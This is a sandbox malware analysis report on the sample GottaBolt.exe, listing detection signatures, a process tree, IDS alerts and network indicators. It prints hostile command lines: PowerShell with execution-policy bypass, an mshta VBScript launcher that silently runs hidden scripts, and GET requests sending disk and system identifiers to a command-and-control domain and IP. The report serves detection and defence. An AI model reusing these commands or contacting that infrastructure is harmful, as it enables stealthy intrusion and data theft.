Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GottaBolt.exe

Overview

General Information

Sample name:GottaBolt.exe
Analysis ID:1561030
MD5:981c56e26ae89a9190d1f1db9d2683ce
SHA1:43a46c1736a4f9f5264dab79761b44e2ea0cc18c
SHA256:79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
Tags:exeuser-smica83
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wscript Shell Run In CommandLine
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • GottaBolt.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\GottaBolt.exe" MD5: 981C56E26AE89A9190D1F1DB9D2683CE)
    • powershell.exe (PID: 5064 cmdline: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 5064 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 4536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 3228 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 5168 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 1252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: GottaBolt.exe PID: 5760JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 4428JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 4428INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x542c9:$b3: ::UTF8.GetString(
        • 0x514dc:$s1: -join
        • 0x7bc73:$s1: -join
        • 0x88d48:$s1: -join
        • 0x8c11a:$s1: -join
        • 0x8c7cc:$s1: -join
        • 0x8e2bd:$s1: -join
        • 0x904c3:$s1: -join
        • 0x90cea:$s1: -join
        • 0x9155a:$s1: -join
        • 0x91c95:$s1: -join
        • 0x91cc7:$s1: -join
        • 0x91d0f:$s1: -join
        • 0x91d2e:$s1: -join
        • 0x9257e:$s1: -join
        • 0x926fa:$s1: -join
        • 0x92772:$s1: -join
        • 0x92805:$s1: -join
        • 0x92a6b:$s1: -join
        • 0x94c01:$s1: -join
        • 0xa364b:$s1: -join
        SourceRuleDescriptionAuthorStrings
        amsi64_4428.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ProcessId: 3228, ProcessName: mshta.exe
          Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\mshta.exe, SourceProcessId: 5064, StartAddress: C6BAAFB0, TargetImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 5064
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3228, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 ", ProcessId: 4428, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe
          Source: Process startedAuthor: frack113: Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close"), ProcessId: 3228, ProcessName: mshta.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5760, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1", ProcessId: 5064, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-22T17:11:47.153718+010020564911Malware Command and Control Activity Detected192.168.2.54971877.91.73.101443TCP
          2024-11-22T17:11:49.665986+010020564911Malware Command and Control Activity Detected192.168.2.54971977.91.73.101443TCP
          2024-11-22T17:11:52.199191+010020564911Malware Command and Control Activity Detected192.168.2.54972077.91.73.101443TCP
          2024-11-22T17:11:54.709108+010020564911Malware Command and Control Activity Detected192.168.2.54972277.91.73.101443TCP
          2024-11-22T17:11:57.233457+010020564911Malware Command and Control Activity Detected192.168.2.54972977.91.73.101443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-22T17:11:49.665986+010028033053Unknown Traffic192.168.2.54971977.91.73.101443TCP
          2024-11-22T17:11:52.199191+010028033053Unknown Traffic192.168.2.54972077.91.73.101443TCP
          2024-11-22T17:11:54.709108+010028033053Unknown Traffic192.168.2.54972277.91.73.101443TCP
          2024-11-22T17:11:57.233457+010028033053Unknown Traffic192.168.2.54972977.91.73.101443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 84.8% probability
          Source: GottaBolt.exeStatic PE information: certificate valid
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49744 version: TLS 1.2
          Source: GottaBolt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\AsyncClientNew\AsyncClient\obj\Release\DulidKolmen.pdb source: powershell.exe, 00000008.00000002.4206767598.000001E8F5FB7000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49718 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49719 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49720 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49722 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.5:49729 -> 77.91.73.101:443
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49729 -> 77.91.73.101:443
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f58%7c171%7c01%3a09%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: dfssinstitute.com
          Source: GottaBolt.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
          Source: GottaBolt.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
          Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280307000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dfssinstitute.com
          Source: powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0?
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0P
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000004.00000002.2375548989.0000024E9EA7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: GottaBolt.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
          Source: GottaBolt.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.3015755599.000001C1A9F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F8668D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: GottaBolt.exe, 00000000.00000002.2629516834.00000252802FE000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com
          Source: GottaBolt.exeString found in binary or memory: https://dfssinstitute.com/
          Source: GottaBolt.exe, 00000000.00000002.2629516834.00000252802F1000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?rs=user
          Source: GottaBolt.exe, 00000000.00000002.2629516834.0000025280350000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803CD000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.000002528041E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.00000252803F6000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.2629516834.0000025280299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?rs=user%7cP9ODU_2ASCSIDiskDevice%7cSCSI%7c6000c292b65879ff477a6af604113f5
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?yjVsmHMwodfFGINSiCsv=YXuuqBFUVgMBaXsghdUv.txt
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DD3A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000C.00000002.3015755599.000001C1AA3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3604226839.0000025F86C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: GottaBolt.exeString found in binary or memory: https://www.ssl.com/repository0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
